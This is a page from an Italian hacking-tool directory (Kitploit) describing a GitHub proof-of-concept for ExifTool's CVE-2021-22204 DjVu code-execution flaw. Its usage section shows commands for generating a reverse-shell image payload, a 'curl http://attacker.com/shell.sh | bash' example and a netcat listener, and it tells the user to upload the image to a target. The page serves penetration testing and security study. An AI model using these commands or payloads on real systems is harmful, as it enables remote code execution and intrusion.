Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-22204 — Exploit RCE per ExifTool (CVE-2021-22204) - versione migliorata, nessuna dipendenza da exiftool | Kitploit
Strumenti/GitHubGitHub/d4ytox/cve-2021-22204
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

Exploit RCE per ExifTool (CVE-2021-22204) - versione migliorata, nessuna dipendenza da exiftool

Vedi Repository
818 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-22204 - Esecuzione Arbitraria di Codice in ExifTool

Una proof-of-concept aggiornata per CVE-2021-22204, una vulnerabilità nelle versioni di ExifTool dalla 7.44 alla 12.23 che consente l'esecuzione arbitraria di codice durante l'elaborazione di file DjVu dannosi.

Crediti

Questo è un lavoro derivato. La vulnerabilità e l'exploit originale non sono miei.

RuoloAutore
Vulnerabilità scoperta daWilliam Bowling (@wcbowling), segnalata tramite il programma bug bounty di GitLab — aprile 2021
PoC originale diUNICORD (NicPWNs & Dev-Yeoj)
Modifiche in questo repository did4ytox

Descrizione

La neutralizzazione impropria dei dati utente nel formato di file DjVu nelle versioni di ExifTool dalla 7.44 alla 12.23 consente l'esecuzione arbitraria di codice durante l'analisi di un'immagine dannosa. Questo exploit genera un file immagine dannoso che, quando elaborato da una versione vulnerabile di ExifTool, esegue codice controllato dall'attaccante.

Cosa cambia in questa versione

Basandosi su UNICORDev/exploit-CVE-2021-22204:

  • Nessuna dipendenza da ExifTool sulla macchina dell'attaccante - L'originale utilizza exiftool -config per incorporare il payload, che fallisce se il proprio ExifTool è stato aggiornato (v12.24+). Questa versione costruisce un payload DjVu puro utilizzando solo djvumake.
  • Funziona su Kali moderno - Compatibile con Python 3.12+ (corregge l'avviso sulla sequenza di escape \c)
  • Dipendenze minime - Richiede solo il pacchetto djvulibre-bin
  • Codice pulito e minimale - Nessuna ASCII art o ritardi artificiali

Queste sono modifiche ingegneristiche a un exploit esistente. Non viene rivendicata alcuna ricerca sulla vulnerabilità.

Requisiti

root@kitploit:~
sudo apt install djvulibre-bin

Utilizzo

Reverse Shell:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

Comando Personalizzato:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

Esempi:

root@kitploit:~
# Genera payload reverse shell
python3 exploit.py -s 192.168.1.100 4444

# Genera payload di esecuzione comandi  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# Avvia il listener e attendi la connessione
nc -nlvp 4444

L'exploit genera image.jpg - caricalo su un target dove ExifTool lo elaborerà.

Versioni Vulnerabili

  • ExifTool 7.44 - 12.23

Riferimenti

  • Voce NVD - CVE-2021-22204
  • Segnalazione originale di William Bowling - HackerOne #1154542
  • Avviso ExifTool
  • Commit della patch ExifTool
  • PoC originale - UNICORDev/exploit-CVE-2021-22204

Dichiarazione di non responsabilità

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.

L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Utilizza questo exploit solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta al test.

L'accesso non autorizzato a sistemi informatici è illegale e punibile per legge. Usa in modo responsabile.

Licenza

MIT, applicata solo alle modifiche in questo repository. La PoC a monte non ha licenza, quindi rimane tutti i diritti riservati ai suoi autori. Consulta LICENSE per l'avviso completo di attribuzione.

Scarica lo strumento